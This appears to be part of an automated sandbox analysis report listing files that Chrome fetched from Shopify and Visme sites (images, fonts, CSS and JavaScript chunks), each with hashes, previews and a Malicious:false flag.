                                                                    SHA-512:619B4BF52F2FEE7199D0AD0E293E6868AEC0B7B44B92CAAAF6BE18EE59C4C2D359C324154F5ECDEC59AC813E294E7AD0DAEDC124CAAC3B0B60A8DF42F66BAA88
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:<svg width="119" height="63" viewBox="0 0 119 63" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="0.5" y="0.5" width="118" height="62" rx="7.28777" fill="white" stroke="url(#paint0_radial_1296_6119)"/>.<g clip-path="url(#clip0_1296_6119)">.<path d="M85.3333 17.8555H90.4717V44.5033H85.3333V17.8555ZM83.3019 31.8366C82.9434 30.5221 82.4654 29.2077 81.6289 28.1322C80.912 27.0567 79.8365 26.2202 78.761 25.6228C77.566 25.0253 76.1321 24.6668 74.5786 24.6668C73.1447 24.6668 71.8302 24.9058 70.6352 25.5033C69.4403 25.9813 68.4843 26.6982 67.6478 27.6542C66.8113 28.6102 66.0943 29.6857 65.7358 30.8806C65.2579 32.0756 65.0189 33.5096 65.0189 34.9435C65.0189 36.3775 65.2579 37.8114 65.7358 39.0064C66.2138 40.2014 66.8113 41.2769 67.6478 42.2328C68.4843 43.0693 69.4403 43.7863 70.6352 44.2643C71.8302 44.7423 73.1447 44.9813 74.5786 44.9813C76.7296 44.9813 78.522 44.5033 80.0755 43.5473C81.6289 42.5913 82.7044 40.9184 83.4214 38.6479H78.8805C78.761 39.2454 78.283 39.8429 77.4465 40.3209C76
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                    Category:downloaded
                                                                    Size (bytes):20606
                                                                    Entropy (8bit):7.9283020833231515
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:DD6E38CAA3451FD025DD91C5C2E6EFC6
                                                                    SHA1:7B88A5FB5FCDAB80B4A6158D18250C1BD7D61286
                                                                    SHA-256:C17161B30C6B5014670A3D01A3D5AB9F5268F2348C64A63E3CC6BCCD78B61F38
                                                                    SHA-512:29E230E036D2E5D04BF39B0AD1AF9206D5A2CCF9B66458C5AC4E2545513AE8F142B51CA29D7A5E426D201BFBEC268EAA4A68F31B05F092AC5BE8F51C09A6B28B
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure/assets/home/redesign2022/carousel-3-mobile-small-f586e6a7e1563512c0524687fe15f2f748c8849992c080de3ae60365d9b5d211.png
                                                                    Preview:RIFFvP..WEBPVP8X....8...i.....ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........ALPH6+.../...$8.k.....\D.tor..m...a...........ZQ.eD..CD."I.m..H@."v.....sg........I.m.m....a2Hg`..L.Z[.-....._.$Y.m...!....9.....0.........|....5...u..j.gb3....5.Y.............]>~........3.........'...(.80tk.....x..N.|....|.._+Ch../w....}..|.. .h..y...>.>.o.|.m..>.M.1#t.a.[....)..X.'.1...8=.".|...,cV.a>.S....,??....`.Yzd...,.6.....>.3.0...w6.zd3T.3...y..q.!.....p\....b...a....7.n_..gSk.lfA8....X.p.(Bs.ea...lm.....u6.=?.1..i.8A...Q...\........Z.......9..~v......Q..1....ky.V..=..w.F..$,'.gB..lI....fO..cl..,0w_.9...
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Web Open Font Format, TrueType, length 19824, version 1.1
                                                                    Category:downloaded
                                                                    Size (bytes):19824
                                                                    Entropy (8bit):7.970306766642997
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:BAFB105BAEB22D965C70FE52BA6B49D9
                                                                    SHA1:934014CC9BBE5883542BE756B3146C05844B254F
                                                                    SHA-256:1570F866BF6EAE82041E407280894A86AD2B8B275E01908AE156914DC693A4ED
                                                                    SHA-512:85A91773B0283E3B2400C773527542228478CC1B9E8AD8EA62435D705E98702A40BEDF26CB5B0900DD8FECC79F802B8C1839184E787D9416886DBC73DFF22A64
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://assets.visme.co/fonts/fonts/roboto-v18-latin-regular.woff
                                                                    Preview:wOFF......Mp.......P........................GDEF.......G...d....GPOS...............hGSUB............7b..OS/2.......R...`tq#.cmap...........L....cvt .......T...T+...fpgm.......5....w.`.gasp...@............glyf...L..:+..j.....hdmx..Fx...g........head..F....6...6.j.zhhea..G........$....hmtx..G8...]......Vlloca..I.........?.#.maxp..Kt... ... ....name..K........t.U9.post..Ld....... .m.dprep..Lx.......I.f..x...1..P......PB..U.=l.@..B)..w.......Y.e.u.m.C.s...x.h.~R....R.....2.x.....[....#N..m.m.m.mfm....SP..NuM..9]..=.U..!...[........w...|......^p....H......;...)..........;..EoDo....E.E.D...`.0.GG.aA.H.V.Mx\xA....../..d3.Eb_.J...R.^v........\^ob.}.z..k.x).v$f$..O)+.2..*....y}6`C6b.6cs...l...........!.........<..|.|..|..|..|.|....o....I%.4.L.SI.&C.6..!`...{...c..\.J.(.2.C....V.A..?.M<nG......v..m.;..R.C..aj.H...=..{.>.:.....}i_Y......:....o.&k..KY.2..6k....i]..{,.p}../.....VO3.o].fJ....R-TZ..;...RN..&V...C...3.?.......&..z.s&.D....r,.I...t.R..a$k..Mm..Y.U...+b.%kQ..
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:SVG Scalable Vector Graphics image
                                                                    Category:dropped
                                                                    Size (bytes):1411
                                                                    Entropy (8bit):4.958030518151497
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:2056963E8697D9892B3ADE64ED6343AF
                                                                    SHA1:AAF406A8C35CFAFB1FC8F1D61C6C6B1942FFD373
                                                                    SHA-256:7D83F70680F31A91224846996DFFF7427E6F393CC7A8F8EE694159993A13B98B
                                                                    SHA-512:8460A3AC5063FAAEA6441179152D30B61D365C37E2849E23DC9382181ADC8C427A5F6A792E030720708D8257ECA219F6D4048436195CFCFFA0B4A367D92641B2
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">.<circle cx="24" cy="24" r="24" fill="#F7F4FE"/>.<circle cx="24" cy="24" r="17" fill="#EFE9FF"/>.<path d="M18.7502 31.2502H29.2502C30.3548 31.2502 31.2502 30.3548 31.2502 29.2502V20.1832C31.2502 19.8977 31.1891 19.6155 31.071 19.3556L30.5332 18.1724C30.2086 17.4584 29.4967 17 28.7124 17H19.2881C18.5038 17 17.7919 17.4584 17.4673 18.1724L16.9295 19.3556C16.8114 19.6155 16.7502 19.8977 16.7502 20.1832V29.2502C16.7502 30.3548 17.6457 31.2502 18.7502 31.2502Z" stroke="#6421F2" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"/>.<path d="M21.5 19.75C21.5 20.9926 20.5 22.25 19 22.25C17.5 22.25 16.75 20.9926 16.75 19.75" stroke="#6421F2" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"/>.<path d="M31.25 19.75C31.25 20.9926 30.5 22.25 29 22.25C27.5 22.25 26.5 20.9926 26.5 19.75" stroke="#6421F2" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"/>.<path
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                    Category:downloaded
                                                                    Size (bytes):29490
                                                                    Entropy (8bit):7.9770929473926735
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:AFD3AE67650DC1F695796DAA112BD794
                                                                    SHA1:4F59BA6D52DBF06272CEA0E3A76DD5D4A6CE21AA
                                                                    SHA-256:4B92F64A7BE671E9B1E43525FB1945A28C4D65B218A6C7C654F9D662BF2ED3CD
                                                                    SHA-512:F8CF36D35453E9169C6A31BBA6EA95612A5FF23DF9E471781B12DF74DD4867FEB46FB899AB786920D42B3E86A1F07B44DE181FC43F22D1ECA7CC6038CD2E799A
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure/assets/home/redesign2022/carousel-2-mobile-small-b3fd61960ed47643ca39fc0fc54d435f77369ddadc3f163ec91fc5a806b33ace.png
                                                                    Preview:RIFF*s..WEBPVP8X....8...i.....ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........ALPH.....' . ..._e#".78.$.ip.......!@.a...W^.....6.mM.J..q...l.N..?..g_.....r5L.^4]..h.p)). .....D..............A...$P.H. ...........Uj%......D.........I.f...~.l.6.5u.VP8 .o...F...*j...>9..C.!.!'.{.@..M.l..U:WUE*. ..G...r..?c.3.C...{..?.?_.u....9..o.........{(.....W........z.~.{......'.......{............?._ _...................._.?..............g...../.......^...=@=G......~n.....?.....9....W...M.e.7.._......?.s.G._.?)|../._../.....w...%.................~......_.~....w............r?......../.Y_..{.!............
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (2552)
                                                                    Category:downloaded
                                                                    Size (bytes):38833
                                                                    Entropy (8bit):5.396122319952389
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:EEBB03B1B0E746977A74E05652A8AB26
                                                                    SHA1:2AE74B816507E6246A2A9D50076A2870D30A3F00
                                                                    SHA-256:7576BBDE791D8F3C2D5F2DCF8026751809D07C23AD4DBBC4068691DF9FCF8F1A
                                                                    SHA-512:876D5E89339CD78E5C4A735ED0FDEB76460781452408684AD2AA18E583C70A23E26F12B9113E838D0935674A2D8ACD43C4FD8C7EAE7EDB825E0C93D261DDF211
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://assets.vidyard.com/play/stylesheets/player-pomo-46eca7ea3ed985164a8e3c8c9eefb8a3.css
                                                                    Preview:._29Gjr{height:100%;width:inherit;position:-ms-device-fixed}...giifV{position:absolute;z-index:1;left:50%;top:50%;transform:translate(-50%, -50%);border:5px solid rgba(35,35,35,0.8);width:3em;height:3em;border-radius:50%;opacity:0;-webkit-animation:_3pWeg 1.1s cubic-bezier(0.6, 0.2, 0, 0.8) infinite,_1Nluf 1.1s linear infinite;animation:_3pWeg 1.1s cubic-bezier(0.6, 0.2, 0, 0.8) infinite,_1Nluf 1.1s linear infinite;transition:opacity 0.2s;pointer-events:none}.giifV._20Z54{opacity:1}@-webkit-keyframes _3pWeg{0%{transform:translate(-50%, -50%) rotate(0deg)}100%{transform:translate(-50%, -50%) rotate(360deg)}}@keyframes _3pWeg{0%{transform:translate(-50%, -50%) rotate(0deg)}100%{transform:translate(-50%, -50%) rotate(360deg)}}@-webkit-keyframes _1Nluf{0%{border-top-color:#ccc}35%{border-top-color:#fff}100%{border-top-color:#ccc}}@keyframes _1Nluf{0%{border-top-color:#ccc}35%{border-top-color:#fff}100%{border-top-color:#ccc}}@media screen and (-ms-high-contrast: active), screen and (forced
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (524)
                                                                    Category:downloaded
                                                                    Size (bytes):525
                                                                    Entropy (8bit):5.30562916585083
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:2134D51FBCF1511AF94C5A924FEAB1E2
                                                                    SHA1:B51808F59886485CA7353212394D0B8C934E3C41
                                                                    SHA-256:9D66C42E0E3AA6283CF40CCA01475AF31C51E8F1DE3F6812B0EBE7807B5B0B9F
                                                                    SHA-512:A0A4073FA36B2B41281C8EE961A23D34593A3746F2779831FB5A866CD18BACA7D6A72358D53B5528E61C1C835401DD9A344C1A94F4A2BA172169A0FA6B429015
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-UGLZPHL3.js
                                                                    Preview:import{a}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js";import{e}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var t=e(a()),o=l=>(0,t.jsx)("svg",{viewBox:"0 0 20 20",...l,children:(0,t.jsx)("path",{d:"m11.414 10 6.293-6.293a1 1 0 0 0-1.414-1.414L10 8.586 3.707 2.293a1 1 0 0 0-1.414 1.414L8.586 10l-6.293 6.293a1 1 0 0 0 1.414 1.414L10 11.414l6.293 6.293a.996.996 0 0 0 1.414 0 1 1 0 0 0 0-1.414L11.414 10z"})}),p=o;export{p as a};.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (485)
                                                                    Category:downloaded
                                                                    Size (bytes):486
                                                                    Entropy (8bit):5.393288724501253
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:C26D51B3BA495E75EFFA98A0EE6FB953
                                                                    SHA1:F97EF090A4D74A4945146D983063C8CD54BDA7C4
                                                                    SHA-256:1A7909B7B1471BE26C57F09AAA676C1A9502FE89919BA18E9A4EF8E27089D40F
                                                                    SHA-512:557553A2C44CEDA09506264D7585BEF694615C883B0DE2B08EA94EE9FCD18247CF4ACEDD7F39939F251B8B762321D6BE51EDC1E8F05675CB13B1B5FE293B7907
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-VQZZYY2U.js
                                                                    Preview:import{a as r}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js";import{e}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var t=e(r()),o=l=>(0,t.jsx)("svg",{viewBox:"0 0 20 20",...l,children:(0,t.jsx)("path",{d:"M17 9H5.414l3.293-3.293a.999.999 0 10-1.414-1.414l-5 5a.999.999 0 000 1.414l5 5a.997.997 0 001.414 0 .999.999 0 000-1.414L5.414 11H17a1 1 0 100-2z",fill:"currentColor"})}),a=o;export{a};.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                    Category:downloaded
                                                                    Size (bytes):139817
                                                                    Entropy (8bit):4.781502079166397
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:DD8CEEA364ED36B65FED53F7B9157C2F
                                                                    SHA1:E1380BB0EFF40985881270A70BAD57534C21F814
                                                                    SHA-256:961FB3844A481E3FD50EE2DDDFE4E1B65D6DFCD80335655461D57C3E2F441303
                                                                    SHA-512:560242D4726283E12306EBEEB7A0B98DFF6D5BE2C45273C4CE1427802F535C9951B6DE9E14DE9D81F9AFBC7C9B78D16E34F69E0226E4DFF78C8AD97C1045621E
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-RCEKJ4KJ.js
                                                                    Preview:import{a as F}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-NTXJAFG3.js";import{a as M}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-VODLJLRC.js";import{a as C}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-R4YRRLCT.js";import{b as p}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-O6AAYXW4.js";import{b as m}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-HLTKSJPY.js";import{a as W}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-TV7DYCAO.js";import{a as r}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js";import{a as k}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-XG4BM7HW.js";import{e as o}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var O=o(k());var d=o(k()),w=!0;functi
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (1809)
                                                                    Category:downloaded
                                                                    Size (bytes):1810
                                                                    Entropy (8bit):5.302687423253291
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:8B813742A27CB1D8D8D1DDED7375F1AE
                                                                    SHA1:5233F1B0F1DAB3E64AB4DDE3DEB63494A36F4318
                                                                    SHA-256:9DF59A484994E08F3F93411216C24BE3353CA51213F22A9D7C82B634FC4BF584
                                                                    SHA-512:990E6078B40186069A3962B246D48C03CC6479A4DFC8CDAB839850DA8687505A3D1FB4AD4756A3CC05D4AB0F92221E068F5686A12D08715B6FA11C14FB7AF8BF
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-KAPAKHAP.js
                                                                    Preview:import{a as d}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-LO4FJPJR.js";import{a as g,i as y}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-ZPCN7UGW.js";import{a as f}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-GF3AKGJL.js";import{b as n}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-O6AAYXW4.js";import{a as u}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js";import{e as c}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var x=n("flex gap-y-sm flex-wrap",{variants:{size:{large:"gap-x-sm",small:"gap-x-2"},center:{true:"justify-center",false:"justify-start"},centralItems:{true:"items-center.",false:""}},defaultVariants:{center:!1}}),B=n("pt-sm",{variants:{center:{true:"text-center",false:"text-left"},mode:{light:"text-black",dark:"text-white"}},defaultVariants:{center
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                    Category:downloaded
                                                                    Size (bytes):20954
                                                                    Entropy (8bit):7.961542402361189
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:72F34CE778F86B12909A427CBEBAE522
                                                                    SHA1:85B5D1CEB2DB9C7A013DE49442623B178B5AC171
                                                                    SHA-256:A10C8C202E4CA0BDD8E60EB082622B2FFFDB4869206B5FFE067F870688F8BD99
                                                                    SHA-512:349EC9BDE57A8D31EAA14B3B3EE5D8395EB7565F2CB9A9B201E447F28FA773521942FE1401E7CF968662B2B7CFBBA74679521FFAFE6AD4A0E7610049095561B5
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure/assets/home/redesign2022/carousel-1-poster-small-59dcf7d6dcf9f48c8e52abd2f932b4416ca93622294d984ab24bebd5c50ccb87.jpg
                                                                    Preview:RIFF.Q..WEBPVP8X....(...(.....ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 BO..pi...*)...>E .E".!..t.(.D..}....?.<..N...Vs..e..u..>.1.^.....p.g....}d.._..5..._x.8...............?..........r}N............/...G.o...>.?...~[.._.....~..Uj....G.............~......o...>.<.|_.c.).U.O._.p...9......._|..=...o....!..../P.T>q...../.....E.S........`...v...........o._.........w./#?........e.G...../............W........U}..2...../.O._.......b(....3..\.......}Y...[.; W....D8L...zi.Ic.K..m...!.........?W.."..%....v........U8.%......'@g.8a...?..CS=.........+.y2...l.,!2....AE!+..$..}...<WO@O.F}
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:SVG Scalable Vector Graphics image
                                                                    Category:dropped
                                                                    Size (bytes):11592
                                                                    Entropy (8bit):4.116695173763959
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:21927A034AFD34391DB39CF2B7ECF709
                                                                    SHA1:2439CD6B0966C045C317F3FCBE68A1F180EB848B
                                                                    SHA-256:5AE1E7093DD8DBD24E11CBBDB4C2DE48AD980628DB0396E8BDAAF252755C1354
                                                                    SHA-512:E1A7026C70057414D61B555A770EDC7C598DD7EDA5FBFD94E1A6C0A9ABC84A80B69C2A64FDE55C621BBF5B65D0EF55276DCBBA0B98992760E0BE7CAEEEAB609C
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:<svg width="137" height="65" viewBox="0 0 137 65" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="1" y="1" width="135" height="63" rx="7.79" fill="white"/>.<path d="M17.1604 19.3863C19.4901 9.74123 27.3706 15.7143 29.8308 16.9383C34.3188 19.1823 36.5628 17.328 37.9072 15.9081C38.5926 15.1921 39.2495 13.3928 39.6942 13.1031C41.0488 11.8893 39.837 14.982 39.837 14.982C39.5351 15.798 38.7864 17.0913 37.3584 21.9445C32.901 37.0956 33.2784 45.2474 35.9182 43.1258C38.0031 41.453 41.1549 32.0466 42.744 28.6683C44.6943 24.5231 48.8906 13.2663 51.7751 14.1843C54.2129 14.9514 49.882 19.3639 48.7151 21.3244C45.1818 27.2404 40.6224 37.2098 37.1544 42.8994C36.7464 43.5624 34.4882 45.6289 33.6232 43.0381C32.9847 41.1205 30.6876 38.9316 37.7542 17.024C37.7807 16.9383 37.3605 17.4912 37.387 17.4055C37.387 17.4055 34.0292 19.7576 29.5432 17.5136C27.083 16.2896 20.9099 10.8428 18.5802 20.4879C16.3852 29.5782 23.2722 28.9988 28.6476 25.6594C30.7284 24.3578 30.8325 22.7136 32.2829 23.2787C33.7334
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (2209)
                                                                    Category:downloaded
                                                                    Size (bytes):2210
                                                                    Entropy (8bit):5.355268664720754
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:6C12E9839BC0A77706327730ADF5D715
                                                                    SHA1:C614243F835A336A201F488B1D09D2E4BD6FF212
                                                                    SHA-256:74D296B90C07AE2DFA6BB47A7C55EA3954B48E423FD9529EEF89A1CBBA52E70E
                                                                    SHA-512:204794EB8609FFA58DB71FE95C84B673D96ABF78345205A348DA728A053D04B3A87A5BE79ECCB6B15C112446762751D224501714A8E771A79E438F3F458FA8E9
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-JITHQERD.js
                                                                    Preview:import{a as b,b as H,c as G,d as B}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-LS3F5NL2.js";import{b as N}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-ZCVWS253.js";import{a as I}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-LO4FJPJR.js";import{b as y}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-OZUJT76U.js";import{b as f}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3HQUNPWN.js";import{d as v}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-TJ5CAOJ6.js";import{b as P}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-RCEKJ4KJ.js";import{ba as u}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-BK6DPWKP.js";import{b as s}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-HLTKSJPY.js";import{a as g}f
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:SVG Scalable Vector Graphics image
                                                                    Category:downloaded
                                                                    Size (bytes):13162
                                                                    Entropy (8bit):3.968533443184042
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:2106514F331BEEEAE3475BFB029D3330
                                                                    SHA1:01C3F15B559A7907D12BD7074842B793A5270ACE
                                                                    SHA-256:2B8BD76BC4B47339259CE2E99FB2BB790EF2BC2A43ACB12DDBBB8DE524E6D7D4
                                                                    SHA-512:3C185C141F0BBDBA2B07D51128CBF12FC7E3E7D7A528173467FC5F3A1C11959ED454B4440C1CB8C6C76D842A6F899B4F4F2CCC3215E6B0FE99C3E6335F80880D
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/b/shopify-brochure2-assets/2106514f331beeeae3475bfb029d3330.svgz
                                                                    Preview:<svg width="181" height="63" viewBox="0 0 181 63" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="0.5" y="0.5" width="180" height="62" rx="7.28777" fill="white" stroke="url(#paint0_radial_1296_6201)"/>.<g clip-path="url(#clip0_1296_6201)">.<path d="M99.587 11.2162C99.2322 10.8228 98.8151 11.051 98.4403 11.2369C98.1255 11.3887 97.8248 11.5692 97.5433 11.7762C97.064 12.1288 96.6055 12.4814 96.167 12.8962C92.7685 16.0273 90.0374 19.6562 87.9522 23.7621C87.6811 24.2806 87.4722 24.8406 87.0344 25.2547C84.3655 27.951 81.2796 29.9214 77.547 30.7503C76.9425 30.8954 76.3174 30.9784 75.6914 30.8954C74.8366 30.7917 74.5448 30.3977 74.7322 29.5473C74.7744 29.3191 74.8996 29.091 74.9411 28.8628C75.0033 28.5317 74.8996 28.2206 74.7322 27.951C74.6699 27.868 74.5862 27.7851 74.5025 27.7021C74.2114 27.4532 73.8566 27.4532 73.5025 27.474H73.4811C73.0225 27.6191 72.5433 27.7643 72.1055 27.951C70.7292 28.5317 69.4151 29.2362 68.1225 29.9621C66.9759 30.6051 65.8085 31.2273 64.5988 31.7458C63.8277
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:HTML document, ASCII text, with very long lines (379)
                                                                    Category:downloaded
                                                                    Size (bytes):755
                                                                    Entropy (8bit):5.5077165701319535
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:DBA8C3935571544102AF13860C968014
                                                                    SHA1:5244667CC05303896557314F722599452E98683F
                                                                    SHA-256:716022FCA8DA299937B00F1232EAD048F8E550F3F8D85449DD7F670306BE8D1B
                                                                    SHA-512:C8013EA9966A39FAF293F8A2E6F9347568EE8802A624593473B7C79DC6E4F1364466DBE813386D0E900838A55B1615B83A4BC66054E9C66375D5A5C67B43F4D4
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://a.visme.co/
                                                                    Preview:<script>. function onMessage(ev) {. if (!ev.isTrusted || ev.origin != 'https://dashboard.visme.co') return;. if (ev.data && ev.data.aid) {. localStorage.setItem('aid', ev.data.aid);. }. }. window.addEventListener('message', onMessage);. if (parent)parent.postMessage({stats: 'ready', aid: localStorage.getItem('aid') || ''}, '*');.</script><script defer src="https://static.cloudflareinsights.com/beacon.min.js/v84a3a4012de94ce1a686ba8c167c359c1696973893317" integrity="sha512-euoFGowhlaLqXsPWQ48qSkBSCFs3DPRyiwVu3FjR96cMPx+Fr+gpWRhIafcHwqwCqWS42RZhIudOvEI+Ckf6MA==" data-cf-beacon='{"rayId":"86b842e6993181c7","version":"2024.3.0","token":"9d47e800619f4bacb18b2f3e08467f1b"}' crossorigin="anonymous"></script>.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 32656, version 1.0
                                                                    Category:downloaded
                                                                    Size (bytes):32656
                                                                    Entropy (8bit):7.993888512454186
                                                                    Encrypted:true
                                                                    SSDEEP:
                                                                    MD5:9D874B20C620B8979C86765FD1CA0766
                                                                    SHA1:A82B6D8CF92D7177112FD7B6D13FE89C12F50BA8
                                                                    SHA-256:71625C4060CDD8478F8EA9D62C83285EB85507E156E706CBB91CE80BA19DC066
                                                                    SHA-512:E5B753ABE93F747FDF17ECCADA3B2D656F8391D39303B74C48C16227BDF9DD159BE6DA6EC9B05E294438F95CC0C26C075D7CFA11E07525D749281D1F3EE13510
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/static/fonts/ShopifySans--regular.woff2
